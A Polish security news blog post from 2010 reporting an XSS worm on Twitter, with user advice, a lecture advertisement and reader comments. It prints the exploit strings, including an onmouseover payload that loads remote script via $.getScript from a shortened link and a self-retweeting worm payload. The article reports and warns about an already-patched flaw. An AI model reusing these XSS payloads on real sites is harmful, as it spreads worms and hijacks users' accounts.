15:59
21/9/2010

Jeśli chcecie zdobyć milion “followersów” musicie się śpieszyć ;-) Dzięki prostemu XSS-owi na Twitterze grasuje sobie właśnie robak. Ze względów bezpieczeństwa sugerujemy wylogowanie się z Twittera i korzystanie z “nieprzeglądarkowych” klientów do tego serwisu.

Robak na Twitterze

Bug został znaleziony przez użytkownika judofyr, który w demonstrującym atak “twitnięciu” umieścił instrukcję podmieniającą tło pod linkami na kolor czarny. Kolejne osoby dodały do tego hm… “exploita” (?) zdarzenie onmouseover wymuszające retwittowanie kodu i przekierowujące użytkowników na strony pornograficzne.

Twitter XSS

XSS w Twitterze

Kod “exploita”:
http://judofyr.net/@"style="background:#000;color:#000;/
Atak wykorzustuje błąd walidowania adresu URL w Twitterze. Cokolwiek, co znajduje się za “@” zostanie dołączone do URL w dodawanych na Twittera wpisach.

Po lekkich modyfikacjach, “payload” tego “exploita” może stać się groźniejszy:
http://t.co/@"style="font-size:999999999999px;"onmouseover="$.getScript('http:\u002f\u002fis.gd\u002ffl9A ....
lub zacznie się sam rozprzestrzeniać:
http://a.no/@"onmouseover=";$('textarea:first').val(this.innerHTML);$('.status-update-form').submit()

Wyłączenie JavaScriptu podczas korzystania z Twittera, wylogowanie się z serwisu, skorzystanie z innych niż przeglądarka klientów jest obecnie całkiem dobrym pomysłem…

Aktualizacja 16:09
Błąd jest już załatany — kto się pobawił, to się pobawił. Przeszukajcie sobie Twittera pod kątem “onmouseover” aby poznać skalę robaka ;-)


Dowiedz się, jak zabezpieczyć swoje dane i pieniądze przed cyberprzestępcami. Wpadnij na nasz kultowy ~3 godzinny wykład pt. "Jak nie dać się zhackować?" i poznaj kilkadziesiąt praktycznych i przede wszystkim prostych do zastosowania porad, które skutecznie podniosą Twoje bezpieczeństwo i pomogą ochronić przed atakami Twoich najbliższych. Uczestnicy tego wykładu oceniają go na: 9,34/10!

Na ten wykład powinien przyjść każdy, kto korzysta z internetu na smartfonie lub komputerze, prywatnie albo służbowo. Wykład prowadzimy prostym językiem, wiec zrozumie go każdy, także osoby spoza branży IT. Dlatego na wykład możesz spokojnie przyjść ze swoimi rodzicami lub mniej technicznymih znajomych. W najbliższych tygodniach będziemy w poniższych miastach:

Zobacz pełen opis wykładu klikając tutaj lub kup bilet na wykład klikając tu.

4 komentarzy

Dodaj komentarz
  1. Mobilny twitter działa i pozwala na kasowanie postów – to tak jakby ktoś musiał ;D

  2. […] P.S. Wzięliśmy plik na tapetę i przeczesujemy go pod kątem podejrzanych instrukcji. Jeśli znajdziemy w nim coś niepokojącego, zaktualizujemy ten post. W międzyczasie zastanówcie się, czy nie warto wyłączyć obsługi JavaScript w przeglądarce (przemawia za tym także dzisiejszy atak na Twitterze). […]

  3. Ciekawi mnie jak ten “robak” grasował sobie po Twitterze i jak zwabiał ofiary.

Twój komentarz

Zamieszczając komentarz akceptujesz regulamin dodawania komentarzy. Przez moderację nie przejdą: wycieczki osobiste, komentarze nie na temat, wulgaryzmy.

RSS dla komentarzy: